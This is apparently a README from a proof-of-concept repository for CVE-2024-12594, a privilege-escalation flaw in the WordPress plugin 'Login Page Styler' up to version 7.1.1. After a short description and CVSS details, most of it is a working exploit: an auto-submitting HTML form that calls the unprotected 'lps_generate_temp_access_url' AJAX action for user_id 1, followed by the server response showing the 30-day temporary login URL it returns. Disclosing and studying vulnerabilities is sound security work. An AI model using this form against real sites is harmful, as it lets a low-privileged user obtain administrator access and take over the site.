ALL In One Custom Login Page <= 7.1.1 - Missing Authorization to Authenticated (Subscriber+)Privilege Escalation# CVE-2024-12594
ALL In One Custom Login Page <= 7.1.1 - Missing Authorization to Authenticated (Subscriber+)Privilege Escalation
# Description
The Custom Login Page Styler – Login Protected Private Site , Change wp-admin login url , WordPress login logo , Temporary admin login access , Rename login , Login customizer, Hide wp-login – Limit Login Attempts – Locked Site plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the 'lps_generate_temp_access_url' AJAX action in all versions up to, and including, 7.1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to login as other users such as subscribers.
## Details
- **Type**: plugin
- **Slug**: login-page-styler
- **Affected Version**: 7.1.1
- **CVSS Score**: 8.8
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-12594
- **Status**: Active
POC
---
```
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="lps_generate_temp_access_url" />
<input type="hidden" name="user_id" value="1" />
<input type="hidden" name="expiration_time" value="2592000" />
<input type="hidden" name="nonce" value="90cc73ad2a" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
```
{"success":true,"data":{"temp_url":"https:\/\/wp-dev.ddev.site?temp_access=Osn6apJoSJunYNqOhDsn&user_id=1","message":"Temporary access URL created successfully for 30 Day(s)."}}
```
[4.0K] /data/pocs/b277617d79a92a8385924f4221ae29e5f3cc7647
└── [1.7K] README.md
0 directories, 1 file